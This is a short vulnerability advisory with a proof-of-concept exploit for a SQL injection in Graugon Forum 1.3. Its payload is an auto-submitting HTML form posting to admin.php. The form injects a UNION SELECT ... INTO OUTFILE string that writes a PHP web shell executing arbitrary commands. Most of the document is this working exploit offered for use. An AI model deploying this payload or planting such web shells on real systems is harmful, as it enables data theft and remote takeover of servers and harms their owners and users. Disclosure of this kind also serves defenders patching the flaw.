<!------------------------------------------------------------------------ # Software................Graugon Forum 1.3 # Vulnerability...........SQL Injection # Threat Level............Critical (4/5) # Download................http://www.graugon.com/ # Discovery Date..........4/3/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A SQL injection vulnerability in Graugon Forum 1.3 can be exploited to # extract arbitrary data. In some environments it may be possible to # create a PHP shell. # # # --PoC-->
<html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/forum/admin.php"> <input type="hidden" name="email" value="'and 1=0 UNION SELECT '<?php system($_GET["CMD"]); ?>','','','','','' FROM dual INTO OUTFILE '../../htdocs/shell.php';#" /> <input type="hidden" name="password" value="" /> </form> </body> </html>
|